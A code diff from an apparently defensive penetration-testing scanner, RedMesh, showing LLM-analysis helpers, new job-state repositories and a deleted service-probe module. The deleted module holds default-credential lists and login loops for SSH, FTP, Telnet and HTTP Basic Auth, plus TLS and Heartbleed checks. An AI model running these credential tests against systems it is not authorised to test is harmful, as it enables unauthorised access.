f"LLM Agent API returned status {response.status_code}", - "status": "api_error", - "details": response.text - } - - # Unwrap response if FastAPI wrapped it (extract 'result' from envelope) - response_data = response.json() - if isinstance(response_data, dict) and "result" in response_data: - return response_data["result"] - return response_data - - except requests.exceptions.ConnectionError: - self.P(f"LLM Agent API not reachable at {url}", color='y') - return {"error": "LLM Agent API not reachable", "status": "connection_error"} - except requests.exceptions.Timeout: - self.P(f"LLM Agent API request timed out", color='y') - return {"error": "LLM Agent API request timed out", "status": "timeout"} - except Exception as e: - self.P(f"Error calling LLM Agent API: {e}", color='r') - return {"error": str(e), "status": "error"} - - def _auto_analyze_report(self, job_id: str, report: dict, target: str) -> Optional[dict]: - """ - Automatically analyze a completed scan report using LLM Agent API. - - Parameters - ---------- - job_id : str - Identifier of the completed job. - report : dict - Aggregated scan report to analyze. - target : str - Target hostname/IP that was scanned. - - Returns - ------- - dict or None - LLM analysis result or None if disabled/failed. - """ - if not self.cfg_llm_agent_api_enabled: - self.Pd("LLM auto-analysis skipped (not enabled)") - return None - - self.P(f"Running LLM auto-analysis for job {job_id}, target {target}...") - - analysis_result = self._call_llm_agent_api( - endpoint="/analyze_scan", - method="POST", - payload={ - "scan_results": report, - "analysis_type": self.cfg_llm_auto_analysis_type, - "focus_areas": None, - } - ) - - if "error" in analysis_result: - self.P(f"LLM auto-analysis failed for job {job_id}: {analysis_result.get('error')}", color='y') - else: - self.P(f"LLM auto-analysis completed for job {job_id}") - - return analysis_result - - def _collect_node_reports(self, workers: dict) -> dict: - """ - Collect individual node reports from all workers. - - Parameters - ---------- - workers : dict - Worker entries from job_specs containing report_cid or result. - - Returns - ------- - dict - Mapping {addr: report_dict} for each worker with data. - """ - all_reports = {} - - for addr, worker_entry in workers.items(): - report = None - report_cid = worker_entry.get("report_cid") - - # Try to fetch from R1FS first - if report_cid: - try: - report = self.r1fs.get_json(report_cid) - self.Pd(f"Fetched report from R1FS for worker {addr}: CID {report_cid}") - except Exception as e: - self.P(f"Failed to fetch report from R1FS for {addr}: {e}", color='y') - - # Fallback to direct result - if not report: - report = worker_entry.get("result") - - if report: - all_reports[addr] = report - - if not all_reports: - self.P("No reports found to collect", color='y') - - return all_reports - - def _run_aggregated_llm_analysis( - self, - job_id: str, - aggregated_report: dict, - job_config: dict, - ) -> str | None: - """ - Run LLM analysis on a pre-aggregated report. - - The caller aggregates once and passes the result. This method - no longer fetches node reports or saves to R1FS. - - Parameters - ---------- - job_id : str - Identifier of the job. - aggregated_report : dict - Pre-aggregated scan data from all workers. - job_config : dict - Job configuration (from R1FS). - - Returns - ------- - str or None - LLM analysis markdown text if successful, None otherwise. - """ - target = job_config.get("target", "unknown") - self.P(f"Running aggregated LLM analysis for job {job_id}, target {target}...") - - if not aggregated_report: - self.P(f"No data to analyze for job {job_id}", color='y') - return None - - # Add job metadata to report for context (strip node_ip — never send to LLM) - report_with_meta = {k: v for k, v in aggregated_report.items() if k != "node_ip"} - report_with_meta["_job_metadata"] = { - "job_id": job_id, - "target": target, - "start_port": job_config.get("start_port"), - "end_port": job_config.get("end_port"), - "enabled_features": job_config.get("enabled_features", []), - "run_mode": job_config.get("run_mode", RUN_MODE_SINGLEPASS), - } - - # Call LLM analysis - llm_analysis = self._auto_analyze_report(job_id, report_with_meta, target) - - if not llm_analysis or "error" in llm_analysis: - self.P( - f"LLM analysis failed for job {job_id}: {llm_analysis.get('error') if llm_analysis else 'No response'}", - color='y' - ) - return None - - # Extract the markdown text from the analysis result - if isinstance(llm_analysis, dict): - return llm_analysis.get("content", llm_analysis.get("analysis", llm_analysis.get("markdown", str(llm_analysis)))) - return str(llm_analysis) - - def _run_quick_summary_analysis( - self, - job_id: str, - aggregated_report: dict, - job_config: dict, - ) -> str | None: - """ - Run a short (2-4 sentence) AI quick summary on a pre-aggregated report. - - The caller aggregates once and passes the result. This method - no longer fetches node reports or saves to R1FS. - - Parameters - ---------- - job_id : str - Identifier of the job. - aggregated_report : dict - Pre-aggregated scan data from all workers. - job_config : dict - Job configuration (from R1FS). - - Returns - ------- - str or None - Quick summary text if successful, None otherwise. - """ - target = job_config.get("target", "unknown") - self.P(f"Running quick summary analysis for job {job_id}, target {target}...") - - if not aggregated_report: - self.P(f"No data for quick summary for job {job_id}", color='y') - return None - - # Add job metadata to report for context (strip node_ip — never send to LLM) - report_with_meta = {k: v for k, v in aggregated_report.items() if k != "node_ip"} - report_with_meta["_job_metadata"] = { - "job_id": job_id, - "target": target, - "start_port": job_config.get("start_port"), - "end_port": job_config.get("end_port"), - "enabled_features": job_config.get("enabled_features", []), - "run_mode": job_config.get("run_mode", RUN_MODE_SINGLEPASS), - } - - # Call LLM analysis with quick_summary type - analysis_result = self._call_llm_agent_api( - endpoint="/analyze_scan", - method="POST", - payload={ - "scan_results": report_with_meta, - "analysis_type": "quick_summary", - "focus_areas": None, - } - ) - - if not analysis_result or "error" in analysis_result: - self.P( - f"Quick summary failed for job {job_id}: {analysis_result.get('error') if analysis_result else 'No response'}", - color='y' - ) - return None - - # Extract the summary text from the result - if isinstance(analysis_result, dict): - return analysis_result.get("content", analysis_result.get("summary", analysis_result.get("analysis", str(analysis_result)))) - return str(analysis_result) - - def _get_llm_health_status(self) -> dict: - """ - Check health of the LLM Agent API connection. - - Returns - ------- - dict - Health status of the LLM Agent API. - """ - if not self.cfg_llm_agent_api_enabled: - return { - "enabled": False, - "status": "disabled", - "message": "LLM Agent API integration is disabled", - } - - if not self.cfg_llm_agent_api_port: - return { - "enabled": True, - "status": "config_error", - "message": "LLM Agent API port not configured", - } - - result = self._call_llm_agent_api(endpoint="/health", method="GET", timeout=5) - - if "error" in result: - return { - "enabled": True, - "status": result.get("status", "error"), - "message": result.get("error"), - "host": self.cfg_llm_agent_api_host, - "port": self.cfg_llm_agent_api_port, - } - - return { - "enabled": True, - "status": "ok", - "host": self.cfg_llm_agent_api_host, - "port": self.cfg_llm_agent_api_port, - "llm_agent_health": result, - } diff --git a/extensions/business/cybersec/red_mesh/repositories/__init__.py b/extensions/business/cybersec/red_mesh/repositories/__init__.py new file mode 100644 index 00000000..1651d9a3 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/repositories/__init__.py @@ -0,0 +1,7 @@ +from .artifacts import ArtifactRepository +from .cstore import JobStateRepository + +__all__ = [ + "ArtifactRepository", + "JobStateRepository", +] diff --git a/extensions/business/cybersec/red_mesh/repositories/artifacts.py b/extensions/business/cybersec/red_mesh/repositories/artifacts.py new file mode 100644 index 00000000..45a1580f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/repositories/artifacts.py @@ -0,0 +1,81 @@ +from ..models import JobArchive, JobConfig, PassReport + + +def _coerce_job_config_dict(payload): + raw = dict(payload or {}) + raw.setdefault("target", raw.get("target_url", "")) + raw.setdefault("start_port", 0) + raw.setdefault("end_port", 0) + return raw + + +class ArtifactRepository: + """Repository for durable RedMesh artifacts stored in R1FS.""" + + def __init__(self, owner): + self.owner = owner + + def get_json(self, cid, *, secret=None): + if not cid: + return None + if secret: + return self.owner.r1fs.get_json(cid, secret=secret) + return self.owner.r1fs.get_json(cid) + + def put_json(self, payload, *, show_logs=False, secret=None): + if secret: + return self.owner.r1fs.add_json(payload, show_logs=show_logs, secret=secret) + return self.owner.r1fs.add_json(payload, show_logs=show_logs) + + def delete(self, cid, *, show_logs=False, raise_on_error=False): + if not cid: + return False + return self.owner.r1fs.delete_file(cid, show_logs=show_logs, raise_on_error=raise_on_error) + + def get_job_config(self, job_specs): + return self.get_json((job_specs or {}).get("job_config_cid")) + + def get_job_config_model(self, job_specs): + payload = self.get_job_config(job_specs) + if not isinstance(payload, dict): + return None + return JobConfig.from_dict(_coerce_job_config_dict(payload)) + + def put_job_config(self, job_config, *, show_logs=False): + if isinstance(job_config, JobConfig): + payload = job_config.to_dict() + else: + payload = JobConfig.from_dict(_coerce_job_config_dict(job_config)).to_dict() + return self.put_json(payload, show_logs=show_logs) + + def get_pass_report(self, report_cid): + return self.get_json(report_cid) + + def get_pass_report_model(self, report_cid): + payload = self.get_pass_report(report_cid) + if not isinstance(payload, dict): + return None + return PassReport.from_dict(payload) + + def put_pass_report(self, pass_report, *, show_logs=False): + if isinstance(pass_report, PassReport): + payload = pass_report.to_dict() + else: + payload = PassReport.from_dict(pass_report).to_dict() + return self.put_json(payload, show_logs=show_logs) + + def get_archive(self, job_specs): + return self.get_json((job_specs or {}).get("job_cid")) + + def get_archive_model(self, job_specs): + payload = self.get_archive(job_specs) + if not isinstance(payload, dict): + return None + return JobArchive.from_dict(payload) + + def put_archive(self, archive, *, show_logs=False): + if isinstance(archive, JobArchive): + payload = archive.to_dict() + else: + payload = JobArchive.from_dict(archive).to_dict() + return self.put_json(payload, show_logs=show_logs) diff --git a/extensions/business/cybersec/red_mesh/repositories/cstore.py b/extensions/business/cybersec/red_mesh/repositories/cstore.py new file mode 100644 index 00000000..71ea8ed8 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/repositories/cstore.py @@ -0,0 +1,223 @@ +from ..models import ( + CStoreJobFinalized, + CStoreJobRunning, + FindingTriageAuditEntry, + FindingTriageState, + WorkerProgress, +) + + +RUNNING_JOB_REQUIRED_FIELDS = { + "job_id", + "job_status", + "run_mode", + "launcher", + "target", + "start_port", + "end_port", + "date_created", + "job_config_cid", +} + + +class JobStateRepository: + """Repository for mutable RedMesh job state stored in CStore.""" + + def __init__(self, owner): + self.owner = owner + + @property + def _jobs_hkey(self): + return self.owner.cfg_instance_id + + @property + def _live_hkey(self): + return f"{self.owner.cfg_instance_id}:live" + + @property + def _triage_hkey(self): + return f"{self.owner.cfg_instance_id}:triage" + + @property + def _triage_audit_hkey(self): + return f"{self.owner.cfg_instance_id}:triage:audit" + + def get_job(self, job_id): + return self.owner.chainstore_hget(hkey=self._jobs_hkey, key=job_id) + + def _coerce_job_payload(self, value): + if isinstance(value, CStoreJobRunning): + return value.to_dict() + if isinstance(value, CStoreJobFinalized): + return value.to_dict() + if not isinstance(value, dict): + return value + payload = dict(value) + if payload.get("job_cid"): + try: + return CStoreJobFinalized.from_dict(payload).to_dict() + except (KeyError, TypeError, ValueError): + return payload + if RUNNING_JOB_REQUIRED_FIELDS.issubset(payload): + try: + return CStoreJobRunning.from_dict(payload).to_dict() + except (KeyError, TypeError, ValueError): + return payload + return payload + + def get_running_job(self, job_id): + payload = self.get_job(job_id) + if not isinstance(payload, dict) or payload.get("job_cid"): + return None + try: + return CStoreJobRunning.from_dict(payload) + except (KeyError, TypeError, ValueError): + return None + + def get_finalized_job(self, job_id): + payload = self.get_job(job_id) + if not isinstance(payload, dict) or not payload.get("job_cid"): + return None + try: + return CStoreJobFinalized.from_dict(payload) + except (KeyError, TypeError, ValueError): + return None + + def list_jobs(self): + return self.owner.chainstore_hgetall(hkey=self._jobs_hkey) + + def put_job(self, job_id, value): + payload = self._coerce_job_payload(value) + self.owner.chainstore_hset(hkey=self._jobs_hkey, key=job_id, value=payload) + return payload + + def put_running_job(self, job): + if isinstance(job, CStoreJobRunning): + payload = job.to_dict() + else: + payload = CStoreJobRunning.from_dict(job).to_dict() + return self.put_job(payload["job_id"], payload) + + def put_finalized_job(self, job): + if isinstance(job, CStoreJobFinalized): + payload = job.to_dict() + else: + payload = CStoreJobFinalized.from_dict(job).to_dict() + return self.put_job(payload["job_id"], payload) + + def delete_job(self, job_id): + self.owner.chainstore_hset(hkey=self._jobs_hkey, key=job_id, value=None) + return + + def list_live_progress(self): + return self.owner.chainstore_hgetall(hkey=self._live_hkey) + + def get_live_progress(self, key): + return self.owner.chainstore_hget(hkey=self._live_hkey, key=key) + + def get_live_progress_model(self, key): + payload = self.get_live_progress(key) + if not isinstance(payload, dict): + return None + return WorkerProgress.from_dict(payload) + + def put_live_progress(self, key, value): + self.owner.chainstore_hset(hkey=self._live_hkey, key=key, value=value) + return value + + def put_live_progress_model(self, progress): + if isinstance(progress, WorkerProgress): + payload = progress.to_dict() + else: + payload = WorkerProgress.from_dict(progress).to_dict() + key = f"{payload['job_id']}:{payload['worker_addr']}" + return self.put_live_progress(key, payload) + + def delete_live_progress(self, key): + self.owner.chainstore_hset(hkey=self._live_hkey, key=key, value=None) + return + + @staticmethod + def triage_key(job_id, finding_id): + return f"{job_id}:{finding_id}" + + def get_finding_triage(self, job_id, finding_id): + return self.owner.chainstore_hget( + hkey=self._triage_hkey, + key=self.triage_key(job_id, finding_id), + ) + + def get_finding_triage_model(self, job_id, finding_id): + payload = self.get_finding_triage(job_id, finding_id) + if not isinstance(payload, dict): + return None + return FindingTriageState.from_dict(payload) + + def list_job_triage(self, job_id): + payload = self.owner.chainstore_hgetall(hkey=self._triage_hkey) or {} + prefix = f"{job_id}:" + return { + key[len(prefix):]: value + for key, value in payload.items() + if isinstance(key, str) and key.startswith(prefix) and isinstance(value, dict) + } + + def list_job_triage_models(self, job_id): + return { + finding_id: FindingTriageState.from_dict(value) + for finding_id, value in self.list_job_triage(job_id).items() + } + + def put_finding_triage(self, triage): + if isinstance(triage, FindingTriageState): + payload = triage.to_dict() + else: + payload = FindingTriageState.from_dict(triage).to_dict() + self.owner.chainstore_hset( + hkey=self._triage_hkey, + key=self.triage_key(payload["job_id"], payload["finding_id"]), + value=payload, + ) + return payload + + def get_finding_triage_audit(self, job_id, finding_id): + payload = self.owner.chainstore_hget( + hkey=self._triage_audit_hkey, + key=self.triage_key(job_id, finding_id), + ) + return payload if isinstance(payload, list) else [] + + def list_job_triage_audit(self, job_id): + payload = self.owner.chainstore_hgetall(hkey=self._triage_audit_hkey) or {} + prefix = f"{job_id}:" + return { + key[len(prefix):]: value + for key, value in payload.items() + if isinstance(key, str) and key.startswith(prefix) and isinstance(value, list) + } + + def append_finding_triage_audit(self, entry): + if isinstance(entry, FindingTriageAuditEntry): + payload = entry.to_dict() + else: + payload = FindingTriageAuditEntry.from_dict(entry).to_dict() + key = self.triage_key(payload["job_id"], payload["finding_id"]) + audit_log = list(self.get_finding_triage_audit(payload["job_id"], payload["finding_id"])) + audit_log.append(payload) + self.owner.chainstore_hset(hkey=self._triage_audit_hkey, key=key, value=audit_log) + return audit_log + + def delete_job_triage(self, job_id): + for finding_id in list(self.list_job_triage(job_id)): + self.owner.chainstore_hset( + hkey=self._triage_hkey, + key=self.triage_key(job_id, finding_id), + value=None, + ) + for finding_id in list(self.list_job_triage_audit(job_id)): + self.owner.chainstore_hset( + hkey=self._triage_audit_hkey, + key=self.triage_key(job_id, finding_id), + value=None, + ) + return diff --git a/extensions/business/cybersec/red_mesh/service_mixin.py b/extensions/business/cybersec/red_mesh/service_mixin.py deleted file mode 100644 index 59fe5a32..00000000 --- a/extensions/business/cybersec/red_mesh/service_mixin.py +++ /dev/null @@ -1,5761 +0,0 @@ -import random -import re as _re -import socket -import struct -import ftplib -import requests -import ssl -from datetime import datetime - -import paramiko - -from .findings import Finding, Severity, probe_result, probe_error -from .cve_db import check_cves - -# Default credentials commonly found on exposed SSH services. -# Kept intentionally small — this is a quick check, not a brute-force. -_SSH_DEFAULT_CREDS = [ - ("root", "root"), - ("root", "toor"), - ("root", "password"), - ("admin", "admin"), - ("admin", "password"), - ("user", "user"), - ("test", "test"), -] - -# Default credentials for FTP services. -_FTP_DEFAULT_CREDS = [ - ("root", "root"), - ("admin", "admin"), - ("admin", "password"), - ("ftp", "ftp"), - ("user", "user"), - ("test", "test"), -] - -# Default credentials for Telnet services. -_TELNET_DEFAULT_CREDS = [ - ("root", "root"), - ("root", "toor"), - ("root", "password"), - ("admin", "admin"), - ("admin", "password"), - ("user", "user"), - ("test", "test"), -] - -_HTTP_SERVER_RE = _re.compile( - r'(Apache|nginx)[/ ]+(\d+(?:\.\d+)+)', _re.IGNORECASE, -) -_HTTP_PRODUCT_MAP = {'apache': 'apache', 'nginx': 'nginx'} - - -class _ServiceInfoMixin: - """ - Network service banner probes feeding RedMesh reports. - - Each helper focuses on a specific protocol and maps findings to - OWASP vulnerability families. The mixin is intentionally light-weight so - that `PentestLocalWorker` threads can run without heavy dependencies while - still surfacing high-signal clues. - """ - - def _emit_metadata(self, category, key_or_item, value=None): - """Safely append to scan_metadata sub-dicts without crashing if state is uninitialized.""" - meta = self.state.get("scan_metadata") - if meta is None: - return - bucket = meta.get(category) - if bucket is None: - return - if isinstance(bucket, dict): - bucket[key_or_item] = value - elif isinstance(bucket, list): - bucket.append(key_or_item) - - def _service_info_http(self, target, port): # default port: 80 - """ - Assess HTTP service: server fingerprint, technology detection, - dangerous HTTP methods, and page title extraction. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - import re as _re - - findings = [] - scheme = "https" if port in (443, 8443) else "http" - url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" - - result = { - "banner": None, - "server": None, - "title": None, - "technologies": [], - "dangerous_methods": [], - } - - # --- 1. GET request — banner, server, title, tech fingerprint --- - try: - self.P(f"Fetching {url} for banner...") - ua = getattr(self, 'scanner_user_agent', '') - headers = {'User-Agent': ua} if ua else {} - resp = requests.get(url, timeout=5, verify=False, allow_redirects=True, headers=headers) - - result["banner"] = f"HTTP {resp.status_code} {resp.reason}" - result["server"] = resp.headers.get("Server") - if result["server"]: - self._emit_metadata("server_versions", port, result["server"]) - if result["server"]: - _m = _HTTP_SERVER_RE.search(result["server"]) - if _m: - _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) - if _cve_product: - findings += check_cves(_cve_product, _m.group(2)) - powered_by = resp.headers.get("X-Powered-By") - - # Page title - title_match = _re.search( - r"(.*?)", resp.text[:5000], _re.IGNORECASE | _re.DOTALL - ) - if title_match: - result["title"] = title_match.group(1).strip()[:100] - - # Technology fingerprinting - body_lower = resp.text[:8000].lower() - tech_signatures = { - "WordPress": ["wp-content", "wp-includes"], - "Joomla": ["com_content", "/media/jui/"], - "Drupal": ["drupal.js", "sites/default/files"], - "Django": ["csrfmiddlewaretoken"], - "PHP": [".php", "phpsessid"], - "ASP.NET": ["__viewstate", ".aspx"], - "React": ["_next/", "__next_data__", "react"], - } - techs = [] - if result["server"]: - techs.append(result["server"]) - if powered_by: - techs.append(powered_by) - for tech, markers in tech_signatures.items(): - if any(m in body_lower for m in markers): - techs.append(tech) - result["technologies"] = techs - - except Exception as e: - # HTTP library failed (e.g. empty reply, connection reset). - # Fall back to raw socket probe — try HTTP/1.0 without Host header - # (some servers like nginx drop requests with unrecognized Host values). - try: - _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - _s.settimeout(3) - _s.connect((target, port)) - # Use HTTP/1.0 without Host — matches nmap's GetRequest probe - _s.send(b"GET / HTTP/1.0\r\n\r\n") - _raw = b"" - while True: - chunk = _s.recv(4096) - if not chunk: - break - _raw += chunk - if len(_raw) > 16384: - break - _s.close() - _raw_str = _raw.decode("utf-8", errors="ignore") - if _raw_str: - lines = _raw_str.split("\r\n") - result["banner"] = lines[0].strip() if lines else "unknown" - for line in lines[1:]: - low = line.lower() - if low.startswith("server:"): - result["server"] = line.split(":", 1)[1].strip() - break - # Report that the server drops Host-header requests - findings.append(Finding( - severity=Severity.INFO, - title="HTTP service drops requests with Host header", - description=f"TCP port {port} returns empty replies for standard HTTP/1.1 " - "requests but responds to HTTP/1.0 without a Host header. " - "This indicates a server_name mismatch or intentional filtering.", - evidence=f"HTTP/1.1 with Host:{target} → empty reply; " - f"HTTP/1.0 without Host → {result['banner']}", - remediation="Configure a proper default server block or virtual host.", - cwe_id="CWE-200", - confidence="certain", - )) - # Check for directory listing in response body - body_start = _raw_str.find("\r\n\r\n") - if body_start > -1: - body = _raw_str[body_start + 4:] - if "directory listing" in body.lower() or "
  • (.*?)", body[:5000], _re.IGNORECASE | _re.DOTALL) - if title_m: - result["title"] = title_m.group(1).strip()[:100] - else: - result["banner"] = "(empty reply)" - findings.append(Finding( - severity=Severity.INFO, - title="HTTP service returns empty reply", - description=f"TCP port {port} accepts connections but the server " - "closes without sending any HTTP response data.", - evidence=f"Raw socket to {target}:{port} — connected OK, received 0 bytes.", - remediation="Investigate why the server sends empty replies; " - "verify proxy/upstream configuration.", - cwe_id="CWE-200", - confidence="certain", - )) - except Exception: - return probe_error(target, port, "HTTP", e) - return probe_result(raw_data=result, findings=findings) - - # --- 2. Dangerous HTTP methods --- - dangerous = [] - for method in ("TRACE", "PUT", "DELETE"): - try: - r = requests.request(method, url, timeout=3, verify=False) - if r.status_code < 400: - dangerous.append(method) - except Exception: - pass - - result["dangerous_methods"] = dangerous - if "TRACE" in dangerous: - findings.append(Finding( - severity=Severity.MEDIUM, - title="HTTP TRACE method enabled (cross-site tracing / XST attack vector).", - description="TRACE echoes request bodies back, enabling cross-site tracing attacks.", - evidence=f"TRACE {url} returned status < 400.", - remediation="Disable the TRACE method in the web server configuration.", - owasp_id="A05:2021", - cwe_id="CWE-693", - confidence="certain", - )) - if "PUT" in dangerous: - findings.append(Finding( - severity=Severity.HIGH, - title="HTTP PUT method enabled (potential unauthorized file upload).", - description="The PUT method allows uploading files to the server.", - evidence=f"PUT {url} returned status < 400.", - remediation="Disable the PUT method or restrict it to authenticated users.", - owasp_id="A01:2021", - cwe_id="CWE-749", - confidence="certain", - )) - if "DELETE" in dangerous: - findings.append(Finding( - severity=Severity.HIGH, - title="HTTP DELETE method enabled (potential unauthorized file deletion).", - description="The DELETE method allows removing resources from the server.", - evidence=f"DELETE {url} returned status < 400.", - remediation="Disable the DELETE method or restrict it to authenticated users.", - owasp_id="A01:2021", - cwe_id="CWE-749", - confidence="certain", - )) - - return probe_result(raw_data=result, findings=findings) - - - def _service_info_http_alt(self, target, port): # default port: 8080 - """ - Probe alternate HTTP port 8080 for verbose banners. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - # Skip standard HTTP ports — they are covered by _service_info_http. - if port in (80, 443): - return None - - findings = [] - raw = {"banner": None, "server": None} - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(2) - sock.connect((target, port)) - ua = getattr(self, 'scanner_user_agent', '') - ua_header = f"\r\nUser-Agent: {ua}" if ua else "" - msg = "HEAD / HTTP/1.1\r\nHost: {}{}\r\n\r\n".format(target, ua_header).encode('utf-8') - sock.send(bytes(msg)) - data = sock.recv(1024).decode('utf-8', errors='ignore') - sock.close() - - if data: - # Extract status line and Server header instead of dumping raw bytes - lines = data.split("\r\n") - status_line = lines[0].strip() if lines else "unknown" - raw["banner"] = status_line - for line in lines[1:]: - if line.lower().startswith("server:"): - raw["server"] = line.split(":", 1)[1].strip() - break - - # NOTE: CVE matching intentionally omitted here — _service_info_http - # already handles CVE lookups for all HTTP ports. Emitting them here - # caused duplicate findings on non-standard ports (batch 3 dedup fix). - except Exception as e: - return probe_error(target, port, "HTTP-ALT", e) - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_https(self, target, port): # default port: 443 - """ - Collect HTTPS response banner data for TLS services. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings. - """ - findings = [] - raw = {"banner": None, "server": None} - try: - url = f"https://{target}" - if port != 443: - url = f"https://{target}:{port}" - self.P(f"Fetching {url} for banner...") - ua = getattr(self, 'scanner_user_agent', '') - headers = {'User-Agent': ua} if ua else {} - resp = requests.get(url, timeout=3, verify=False, headers=headers) - raw["banner"] = f"HTTPS {resp.status_code} {resp.reason}" - raw["server"] = resp.headers.get("Server") - if raw["server"]: - _m = _HTTP_SERVER_RE.search(raw["server"]) - if _m: - _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) - if _cve_product: - findings += check_cves(_cve_product, _m.group(2)) - findings.append(Finding( - severity=Severity.INFO, - title=f"HTTPS service detected ({resp.status_code} {resp.reason})", - description=f"HTTPS service on {target}:{port}.", - evidence=f"Server: {raw['server'] or 'not disclosed'}", - confidence="certain", - )) - except Exception as e: - return probe_error(target, port, "HTTPS", e) - return probe_result(raw_data=raw, findings=findings) - - - # Default credentials for HTTP Basic Auth testing - _HTTP_BASIC_CREDS = [ - ("admin", "admin"), ("admin", "password"), ("admin", "1234"), - ("root", "root"), ("root", "password"), ("root", "toor"), - ("user", "user"), ("test", "test"), ("guest", "guest"), - ("admin", ""), ("tomcat", "tomcat"), ("manager", "manager"), - ] - - def _service_info_http_basic_auth(self, target, port): - """ - Test HTTP Basic Auth endpoints for default/weak credentials. - - Only runs when the target responds with 401 + WWW-Authenticate: Basic. - Tests a small set of default credential pairs. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict or None - Structured findings, or None if no Basic Auth detected. - """ - findings = [] - raw = {"basic_auth_detected": False, "tested": 0, "accepted": []} - scheme = "https" if port in (443, 8443) else "http" - base_url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" - - # Probe / and /admin for 401 + Basic auth - auth_url = None - realm = None - for path in ("/", "/admin", "/manager"): - try: - resp = requests.get(base_url + path, timeout=3, verify=False) - if resp.status_code == 401: - www_auth = resp.headers.get("WWW-Authenticate", "") - if "Basic" in www_auth: - auth_url = base_url + path - realm_match = _re.search(r'realm="?([^"]*)"?', www_auth, _re.IGNORECASE) - realm = realm_match.group(1) if realm_match else "unknown" - break - except Exception: - continue - - if not auth_url: - return None # No Basic auth detected — skip entirely - - raw["basic_auth_detected"] = True - raw["realm"] = realm - - # Test credentials - consecutive_401 = 0 - for username, password in self._HTTP_BASIC_CREDS: - try: - resp = requests.get(auth_url, timeout=3, verify=False, auth=(username, password)) - raw["tested"] += 1 - - if resp.status_code == 429: - break # rate limited — stop - - if resp.status_code == 200 or resp.status_code == 301 or resp.status_code == 302: - cred_str = f"{username}:{password}" if password else f"{username}:(empty)" - raw["accepted"].append(cred_str) - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"HTTP Basic Auth default credential: {cred_str}", - description=f"The web server at {auth_url} (realm: {realm}) accepted a default credential.", - evidence=f"GET {auth_url} with {cred_str} → HTTP {resp.status_code}", - remediation="Change default credentials immediately.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - elif resp.status_code == 401: - consecutive_401 += 1 - except Exception: - break - - # No rate limiting after all attempts - if consecutive_401 >= len(self._HTTP_BASIC_CREDS) - 1: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"HTTP Basic Auth has no rate limiting ({raw['tested']} attempts accepted)", - description="The server does not rate-limit failed authentication attempts.", - evidence=f"{consecutive_401} consecutive 401 responses without rate limiting.", - remediation="Implement account lockout or rate limiting for failed auth attempts.", - owasp_id="A07:2021", - cwe_id="CWE-307", - confidence="firm", - )) - - return probe_result(raw_data=raw, findings=findings) - - - def _service_info_tls(self, target, port): - """ - Inspect TLS handshake, certificate chain, and cipher strength. - - Uses a two-pass approach: unverified connect (always gets protocol/cipher), - then verified connect (detects self-signed / chain issues). - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings with protocol, cipher, cert details. - """ - findings = [] - raw = {"protocol": None, "cipher": None, "cert_subject": None, "cert_issuer": None} - - # Pass 1: Unverified — always get protocol/cipher - proto, cipher, cert_der = self._tls_unverified_connect(target, port) - if proto is None: - return probe_error(target, port, "TLS", Exception("unverified connect failed")) - - raw["protocol"], raw["cipher"] = proto, cipher - findings += self._tls_check_protocol(proto, cipher) - - # Pass 1b: SAN parsing and signature check from DER cert - if cert_der: - san_dns, san_ips = self._tls_parse_san_from_der(cert_der) - raw["san_dns"] = san_dns - raw["san_ips"] = san_ips - for ip_str in san_ips: - try: - import ipaddress as _ipaddress - if _ipaddress.ip_address(ip_str).is_private: - self._emit_metadata("internal_ips", {"ip": ip_str, "source": f"tls_san:{port}"}) - except (ValueError, TypeError): - pass - findings += self._tls_check_signature_algorithm(cert_der) - findings += self._tls_check_validity_period(cert_der) - - # Pass 2: Verified — detect self-signed / chain issues - findings += self._tls_check_certificate(target, port, raw) - - # Pass 3: Cert content checks (expiry, default CN) - findings += self._tls_check_expiry(raw) - findings += self._tls_check_default_cn(raw) - - # Pass 4: Heartbleed (CVE-2014-0160) - heartbleed = self._tls_check_heartbleed(target, port) - if heartbleed: - findings.append(heartbleed) - - # Pass 5: Downgrade attacks (POODLE / BEAST) - findings += self._tls_check_downgrade(target, port) - - if not findings: - findings.append(Finding(Severity.INFO, f"TLS {proto} {cipher}", "TLS configuration adequate.")) - - return probe_result(raw_data=raw, findings=findings) - - def _tls_unverified_connect(self, target, port): - """Unverified TLS connect to get protocol, cipher, and DER cert.""" - try: - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - with socket.create_connection((target, port), timeout=3) as sock: - with ctx.wrap_socket(sock, server_hostname=target) as ssock: - proto = ssock.version() - cipher_info = ssock.cipher() - cipher_name = cipher_info[0] if cipher_info else "unknown" - cert_der = ssock.getpeercert(binary_form=True) - return proto, cipher_name, cert_der - except Exception as e: - self.P(f"TLS unverified connect failed on {target}:{port}: {e}", color='y') - return None, None, None - - def _tls_check_protocol(self, proto, cipher): - """Flag obsolete TLS/SSL protocols and weak ciphers.""" - findings = [] - if proto and proto.upper() in ("SSLV2", "SSLV3", "TLSV1", "TLSV1.1"): - findings.append(Finding( - severity=Severity.HIGH, - title=f"Obsolete TLS protocol: {proto}", - description=f"Server negotiated {proto} with cipher {cipher}. " - f"SSLv2/v3 and TLS 1.0/1.1 are deprecated and vulnerable.", - evidence=f"protocol={proto}, cipher={cipher}", - remediation="Disable SSLv2/v3/TLS 1.0/1.1 and require TLS 1.2+.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - if cipher and any(w in cipher.lower() for w in ("rc4", 